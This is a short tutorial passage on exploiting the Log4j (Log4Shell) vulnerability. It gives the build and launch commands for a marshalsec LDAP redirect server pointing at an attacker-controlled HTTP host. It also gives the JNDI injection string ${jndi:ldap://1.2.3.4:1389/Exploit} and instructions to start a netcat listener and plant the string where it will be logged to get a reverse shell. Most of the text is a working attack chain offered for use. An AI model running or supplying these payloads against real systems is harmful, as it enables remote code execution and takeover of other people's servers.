Delivery through a vulnerable version of Log4j is done through a four step process: Malicious string → LDAP lookup → load Java code over HTTP → reverse shell.
A simple Java LDAP server that will handle redirects is available at https://github.com/mbechler/marshalsec. It can be built with Apache Maven using the version of OpenJDK supplied with Kali Linux:
mvn clean package -DskipTestsAnd run with:
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar \
marshalsec.jndi.LDAPRefServer \
"http://$ATTACKER_IP:$ATTACKER_PORT/#Exploit"Where $ATTACKER_IP and $ATTACKER_PORT are the IP address and port of an HTTP server that will be used to actually serve up the exploit.
Once that’s done you’ll just need to fire up a quick web server to serve appropriate exploit code and a netcat listener, and then find a way to deliver the malicious string (${jndi:ldap://1.2.3.4:1389/Exploit}, where 1.2.3.4 is the $ATTACKER_IP above) somewhere it will be logged.
Note that a number of other protocols are supported besides LDAP (the marchalsec server supports a few).